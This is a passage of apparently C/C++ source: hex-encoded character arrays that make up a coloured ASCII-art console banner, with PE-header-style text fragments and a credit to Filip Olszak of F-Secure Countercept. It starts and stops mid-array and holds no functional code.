0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x5a, 0x48, 0x2e, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x4c, 0x2e, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70, 0x72, 0x6f, 0x67, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x72, 0x61, 0x6d, 0x20, 0x63, 0x61, 0x6e, 0x6e, 0x6f, 0x74, 0x20, 0x62, 0x65, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x72, 0x75, 0x6e, 0x20, 0x69, 0x6e, 0x20, 0x44, 0x4f, 0x53, 0x20, 0x6d, 0x6f, 0x64, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x65, 0x2e, 0x2e, 0x2e, 0x2e, 0x24, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x2e, 0x6b, 0x6e, 0x52, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x00 };
159 |     char header2[]{ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x2f, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x25, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x28, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x5f, 0x5f, 0x5f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x5f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x5f, 0x5f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x5f, 0x5f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2f, 0x20, 0x5f, 0x20, 0x5c, 0x5f, 0x5f, 0x5f, 0x5f, 0x28, 0x5f, 0x29, 0x5f, 0x5f, 0x20, 0x20, 0x2f, 0x20, 0x2f, 0x20, 0x20, 0x5f, 0x5f, 0x5f, 0x20, 0x20, 0x5f, 0x5f, 0x5f, 0x20, 0x5f, 0x5f, 0x5f, 0x5f, 0x2f, 0x20, 0x2f, 0x5f, 0x5f, 0x20, 0x5f, 0x5f, 0x5f, 0x5f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x2f, 0x20, 0x2f, 0x2f, 0x20, 0x2f, 0x20, 0x5f, 0x5f, 0x2f, 0x20, 0x2f, 0x20, 0x5f, 0x20, 0x5c, 0x2f, 0x20, 0x2f, 0x5f, 0x5f, 0x2f, 0x20, 0x5f, 0x20, 0x5c, 0x2f, 0x20, 0x5f, 0x20, 0x60, 0x2f, 0x20, 0x5f, 0x20, 0x20, 0x2f, 0x20, 0x2d, 0x5f, 0x29, 0x20, 0x5f, 0x5f, 0x2f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x2f, 0x5f, 0x5f, 0x5f, 0x5f, 0x2f, 0x5f, 0x2f, 0x20, 0x2f, 0x5f, 0x2f, 0x20, 0x2e, 0x5f, 0x5f, 0x2f, 0x5f, 0x5f, 0x5f, 0x5f, 0x2f, 0x5c, 0x5f, 0x5f, 0x5f, 0x2f, 0x5c, 0x5f, 0x2c, 0x5f, 0x2f, 0x5c, 0x5f, 0x2c, 0x5f, 0x2f, 0x5c, 0x5f, 0x5f, 0x2f, 0x5f, 0x2f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2f, 0x5f, 0x2f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x62, 0x79, 0x20, 0x46, 0x69, 0x6c, 0x69, 0x70, 0x20, 0x4f, 0x6c, 0x73, 0x7a, 0x61, 0x6b, 0x20, 0x20, 0x28, 0x40, 0x5f, 0x6c, 0x70, 0x76, 0x6f, 0x69, 0x64, 0x29, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x46, 0x2d, 0x53, 0x65, 0x63, 0x75, 0x72, 0x65, 0x20, 0x43, 0x6f, 0x75, 0x6e, 0x74, 0x65, 0x72, 0x63, 0x65, 0x70, 0x74, 0x20, 0x44, 0x52, 0x54, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x4d, 0x5a, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x41, 0x52, 0x55, 0x48, 0x2e, 0x2e, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x48, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x5a, 0x48, 0x2e, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 